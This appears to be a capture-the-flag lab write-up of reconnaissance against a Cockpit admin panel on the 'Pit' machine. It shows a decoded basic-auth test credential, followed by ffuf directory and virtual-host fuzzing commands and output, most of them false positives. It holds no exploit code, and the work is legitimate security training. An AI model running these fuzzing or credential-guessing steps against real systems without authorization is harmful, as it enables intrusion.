Web
Nmap discovered a web server on the target port While Nmap was unable to identify the service, the fingerprint output reveals some suggestive information
Webroot
It appears to be a login page to a web-based administrative panel.
I captured the responses from the web server using Burp Suite
The result shows that it’s Cockpit
cockpit is a server administration tool sponsored by Red Hat, focused on providing a modern-looking and user-friendly interface to manage and administer servers. Fedora 21 included Cockpit by default, and since then, it has continued to grow and mature. Red Hat Enterprise Linux 7 included Cockpit in the optional and extras repositories, and it’s included in Red Hat Enterprise Linux 8 by default.
cockpit is not the first of its class (many old-time system administrators may remember webmin), but the alternatives are usually clunky, bloated, and their underlying APIs may be a security risk. That’s where Cockpit is different and shines. With Cockpit, unnecessary services or APIs don’t get in the way of doing things.
Version Information
The version information can be checked through /api/system/cockpit-version, but the web server re-directs me to a login page.
It’s either that the version information is being actively hidden or protected behind authentication
Basic HTTP Authentication
While I was testing some weak/default credential, I found something interesting.
Usually web application uses POST requests for signing-in, but Cockpit, in this case, uses a GET request to /cockpit/login using the basic HTTP authentication
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ echo YWRtaW46cGFzc3dvcmQ= | base64 -d
admin:passwordSo this suggests that I may be able to brute-force my way in although it is not very practical in the real world application
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://dms-pit.htb:9090/FUZZ -ic -e .php,.txt,.html -fs 43548
________________________________________________
:: Method : GET
:: URL : https://dms-pit.htb:9090/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 43548
________________________________________________
Research [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 602ms]
ping [Status: 200, Size: 24, Words: 4, Lines: 1, Duration: 95ms]
news_archive [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 469ms]
momentum [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 577ms]
about_logo [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 587ms]
Nav [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 680ms]
Environmental [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
stirmark [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2417ms]
blk_bl [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
7983 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2907ms]
83379 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 610ms]
9857 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
picture-messages [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2638ms]
visitor_map [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 921ms]
lumines-ii [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3456ms]
gnue [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 541ms]
73026 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 594ms]
Livsstil [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 362ms]
seasonsum_navcurve [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
article32 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1348ms]
qlogic [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 93ms]
topio [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 94ms]
link-2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 93ms]
ban_home [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 92ms]
ingenierie [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 92ms]
emulex [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 94ms]
:: Progress: [882188/882188] :: Job [1/1] :: 423 req/sec :: Duration: [0:53:28] :: Errors: 0 ::Everything except for ping is false-positive as they contain 1 word
/ping
Navigating to /ping shows a JSON data
Nothing special here.
Sub-domain / Virtual Host Discovery
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://$IP:9090/ -H 'Host: FUZZ.dms-pit.htb' -fs 43548
________________________________________________
:: Method : GET
:: URL : https://10.10.10.241:9090/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.dms-pit.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 43548
________________________________________________
web3371 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
web18783 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 845ms]
web3522 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 846ms]
tix [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 579ms]
auta [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 581ms]
delivery.o [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
mobiclub [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
dalia [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
gi455 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
gi454 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
www.theotherside [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 130ms]
gi453 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 126ms]
images.b [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 129ms]
gi451 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
gi452 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2105ms]
waisu-xsrvjp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
marukyo-net-cojp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
gates-xsrvjp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
sol-tec-cojp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
tkt-center-info [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
fairyparadise-com [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
xinfo738-xsrvjp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 117ms]
k2k2-jp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 116ms]
kimono-united-com [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 110ms]
hmhits-com [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 123ms]
sorahime-com [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
db08 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
soooooooooon-xsrvjp [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 116ms]
:: Progress: [114441/114441] :: Job [1/1] :: 189 req/sec :: Duration: [0:22:29] :: Errors: 4 ::All the returned results from ffuf are false-positive as they contain 1 word